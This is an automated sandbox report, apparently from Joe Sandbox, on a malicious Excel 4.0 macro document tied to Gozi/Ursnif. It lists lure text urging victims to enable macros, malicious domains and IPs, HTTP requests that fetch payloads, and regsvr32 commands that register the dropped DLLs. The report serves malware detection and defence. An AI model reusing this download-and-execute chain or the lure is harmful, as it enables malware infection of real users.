Loading ...

Play interactive tourEdit tour

Analysis Report 12345.xlsm

Overview

General Information

Sample Name:12345.xlsm
Analysis ID:382553
MD5:5851c6423d6cffdbfdd9ce4276592acb
SHA1:8992a00647a35e67a887127b5aa7269cc9c597c6
SHA256:a7893081be92e7c0c1672482df252f282abca98ff09ff559f246bcc5244d74c3
Tags:GGGoziISFBUrsnifxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Yara detected Xls With Macro 4.0

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 7080 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 1320 cmdline: regsvr32.exe -s ..\nvcoerf.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4732 cmdline: regsvr32.exe -s ..\nvcoerf1.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 4296 cmdline: regsvr32.exe -s ..\nvcoerf2.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 2044 cmdline: regsvr32.exe -s ..\nvcoerf3.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • regsvr32.exe (PID: 404 cmdline: regsvr32.exe -s ..\nvcoerf4.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for domain / URLShow sources
    Source: laura9630fr.comVirustotal: Detection: 7%Perma Link
    Source: mills-skyla30ec.comVirustotal: Detection: 7%Perma Link
    Source: velma-harber30ku.comVirustotal: Detection: 7%Perma Link
    Multi AV Scanner detection for submitted fileShow sources
    Source: 12345.xlsmReversingLabs: Detection: 16%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficDNS query: name: velma-harber30ku.com
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 8.211.4.209:80
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 8.211.4.209:80
    Source: Joe Sandbox ViewIP Address: 103.205.143.227 103.205.143.227
    Source: Joe Sandbox ViewIP Address: 8.211.4.209 8.211.4.209
    Source: Joe Sandbox ViewIP Address: 74.208.236.90 74.208.236.90
    Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: velma-harber30ku.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: laura9630fr.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mills-skyla30ec.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: moumitas.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jacktech.jackindia.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: velma-harber30ku.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: laura9630fr.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /gg.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: mills-skyla30ec.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: moumitas.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /ds/0204.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: jacktech.jackindia.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: velma-harber30ku.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableDate: Tue, 06 Apr 2021 07:55:14 GMTServer: Apache/2.4.6 (CentOS) PHP/5.4.16X-Powered-By: PHP/5.4.16Content-Length: 74Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 68 31 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 67 67 2e 67 69 66 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e Data Ascii: <h1>Not Found.</h1>The requested URL /gg.gif was not found on this server.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.aadrm.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.cortana.ai
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.office.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.onedrive.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://augloop.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cdn.entity.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://clients.config.office.net/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://config.edge.skype.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cortana.ai
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cortana.ai/api
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://cr.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dev.cortana.ai
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://devnull.onenote.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://directory.services.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://graph.windows.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://graph.windows.net/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://lifecycle.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://login.windows.local
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://management.azure.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://management.azure.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://messaging.office.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ncus.contentsync.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://officeapps.live.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://onedrive.live.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://outlook.office.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://outlook.office365.com/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://settings.outlook.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://staging.cortana.ai
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://tasks.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://wus2.contentsync.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: AA6A7A15-C192-4C5E-9786-60055125516D.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11_ from the yellow bar above 12 13_ Once You have Enable Editing , please click E
    Source: Screenshot number: 4Screenshot OCR: Enable Content 14 from the yellow bar above 15 / , 16 " 17 '8 WHY I CANNOT OPEN THIS DOCUME
    Source: Screenshot number: 8Screenshot OCR: Enable Editing from the yellow bar above i Calibri - 18 - A" A" ES Once You have Enable Editing ,
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Source: Document image extraction number: 9Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 9Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 15Screenshot OCR: Enable Editing from the yellow bar above CB Once You have Enable Editing, please click Enable Cont
    Source: Document image extraction number: 15Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Source: Screenshot number: 12Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above O WHY I CANNOT OPEN THIS DOCUMENT? W You are using iOS
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: 12345.xlsmInitial sample: EXEC
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: 12345.xlsmInitial sample: Sheet size: 30888
    Source: workbook.xmlBinary string: " sheetId="5" r:id="rId1"/><sheet name="Doc1" sheetId="4" r:id="rId2"/><sheet name="Doc2" sheetId="1" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">'Doc1'!$BO$133</definedName></definedNames><calcPr calcId="122211"/></workbook>
